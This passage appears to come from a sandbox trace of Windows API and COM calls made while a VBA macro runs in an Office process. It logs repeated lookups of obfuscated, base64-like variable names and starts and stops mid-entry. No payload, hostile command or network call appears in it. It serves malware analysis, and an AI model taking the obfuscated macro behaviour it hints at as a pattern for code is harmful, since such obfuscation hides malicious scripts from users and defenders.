0x0 [0068.907] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.907] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.907] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_VDX1Xw", lHashVal=0x10d3b7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.907] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.907] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.907] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_VDX1Xw", lHashVal=0x10d3b7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.907] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.907] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.907] IUnknown:Release (This=0x665ba50) returned 0xd [0068.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b100de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_VDX1Xw") returned 14 [0068.908] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_VDX1Xw", lHashVal=0x10d3b7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x58003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x58003100000000, pDummy=0x0) returned 0x0 [0068.908] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61652 | out: _Dst=0x144ec0) returned 0x0 [0068.908] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zCABUkAZ", lHashVal=0x101f0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6167a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zCABUkAZ") returned 9 [0068.908] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zCABUkAZ", lHashVal=0x101f0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6167a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zCABUkAZ") returned 9 [0068.908] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zCABUkAZ", lHashVal=0x101f0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCABUkAZ") returned 0x101f0c [0068.908] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zCABUkAZ" | out: _Dst="zCABUkAZ") returned 0x0 [0068.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zCABUkAZ") returned 9 [0068.908] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.908] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zCABUkAZ", lHashVal=0x101f0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.908] IUnknown:Release (This=0x665ba50) returned 0xd [0068.908] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.908] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zCABUkAZ", lHashVal=0x101f0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.908] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.908] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.908] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zCABUkAZ", lHashVal=0x101f0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.908] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.908] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.908] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zCABUkAZ", lHashVal=0x101f0c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.908] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6167a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zCABUkAZ") returned 9 [0068.908] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zCABUkAZ", lHashVal=0x101f0c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.908] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.908] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6167a | out: _Dst=0x67c2d40) returned 0x0 [0068.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zCABUkAZ") returned 0x10f6d4 [0068.908] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zCABUkAZ" | out: _Dst="_B_var_zCABUkAZ") returned 0x0 [0068.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_zCABUkAZ") returned 16 [0068.909] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.909] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zCABUkAZ", lHashVal=0x10f6d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.909] IUnknown:Release (This=0x665ba50) returned 0xd [0068.909] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.909] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zCABUkAZ", lHashVal=0x10f6d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.909] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.909] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.909] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zCABUkAZ", lHashVal=0x10f6d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.909] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.909] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.909] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zCABUkAZ", lHashVal=0x10f6d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.909] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.909] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.909] IUnknown:Release (This=0x665ba50) returned 0xd [0068.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1010e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zCABUkAZ") returned 16 [0068.909] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zCABUkAZ", lHashVal=0x10f6d4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x55004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x55004200000000, pDummy=0x0) returned 0x0 [0068.909] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6167a | out: _Dst=0x144ec0) returned 0x0 [0068.909] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qQoAAA", lHashVal=0x10af8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616a6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qQoAAA") returned 7 [0068.909] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qQoAAA", lHashVal=0x10af8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616a6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qQoAAA") returned 7 [0068.909] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qQoAAA", lHashVal=0x10af8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qQoAAA") returned 0x10af8c [0068.909] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="qQoAAA" | out: _Dst="qQoAAA") returned 0x0 [0068.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="qQoAAA") returned 7 [0068.909] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.909] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qQoAAA", lHashVal=0x10af8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.909] IUnknown:Release (This=0x665ba50) returned 0xd [0068.909] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.909] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qQoAAA", lHashVal=0x10af8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.909] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.909] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.909] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qQoAAA", lHashVal=0x10af8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.910] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.910] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.910] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qQoAAA", lHashVal=0x10af8c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.910] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616a6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qQoAAA") returned 7 [0068.910] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qQoAAA", lHashVal=0x10af8c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.910] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.910] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a616a6 | out: _Dst=0x67c2d40) returned 0x0 [0068.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qQoAAA") returned 0x1029f6 [0068.910] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_qQoAAA" | out: _Dst="_B_var_qQoAAA") returned 0x0 [0068.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_qQoAAA") returned 14 [0068.910] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.910] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qQoAAA", lHashVal=0x1029f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.910] IUnknown:Release (This=0x665ba50) returned 0xd [0068.910] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.910] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qQoAAA", lHashVal=0x1029f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.910] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.910] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.910] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qQoAAA", lHashVal=0x1029f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.910] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.910] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.910] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qQoAAA", lHashVal=0x1029f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.910] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.910] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.910] IUnknown:Release (This=0x665ba50) returned 0xd [0068.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1013e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_qQoAAA") returned 14 [0068.910] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qQoAAA", lHashVal=0x1029f6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.910] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a616a6 | out: _Dst=0x144ec0) returned 0x0 [0068.910] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AAQAA4BD", lHashVal=0x10aa95, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AAQAA4BD") returned 9 [0068.910] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AAQAA4BD", lHashVal=0x10aa95, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AAQAA4BD") returned 9 [0068.911] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AAQAA4BD", lHashVal=0x10aa95, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AAQAA4BD") returned 0x10aa95 [0068.911] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="AAQAA4BD" | out: _Dst="AAQAA4BD") returned 0x0 [0068.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="AAQAA4BD") returned 9 [0068.911] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.911] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AAQAA4BD", lHashVal=0x10aa95, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.911] IUnknown:Release (This=0x665ba50) returned 0xd [0068.911] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.911] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AAQAA4BD", lHashVal=0x10aa95, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.911] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.911] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.911] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AAQAA4BD", lHashVal=0x10aa95, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.911] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.911] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.911] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AAQAA4BD", lHashVal=0x10aa95, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.911] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AAQAA4BD") returned 9 [0068.911] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AAQAA4BD", lHashVal=0x10aa95, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.911] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.911] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a616ce | out: _Dst=0x67c2d40) returned 0x0 [0068.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AAQAA4BD") returned 0x10821e [0068.911] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_AAQAA4BD" | out: _Dst="_B_var_AAQAA4BD") returned 0x0 [0068.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_AAQAA4BD") returned 16 [0068.911] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.911] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AAQAA4BD", lHashVal=0x10821e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.911] IUnknown:Release (This=0x665ba50) returned 0xd [0068.911] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.911] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AAQAA4BD", lHashVal=0x10821e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.911] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.911] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.911] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AAQAA4BD", lHashVal=0x10821e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.911] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.911] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.911] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AAQAA4BD", lHashVal=0x10821e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.911] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.911] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.911] IUnknown:Release (This=0x665ba50) returned 0xd [0068.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1016e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_AAQAA4BD") returned 16 [0068.912] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AAQAA4BD", lHashVal=0x10821e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.912] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a616ce | out: _Dst=0x144ec0) returned 0x0 [0068.912] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.912] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.912] IUnknown:Release (This=0x665ba50) returned 0xd [0068.912] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.912] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.912] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.912] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.912] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.912] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0068.913] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.913] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.913] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.913] IUnknown:Release (This=0x665ba50) returned 0xd [0068.913] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.913] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.913] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.913] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.913] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.913] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.913] IUnknown:Release (This=0x665ba50) returned 0xd [0068.913] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.913] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.913] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, 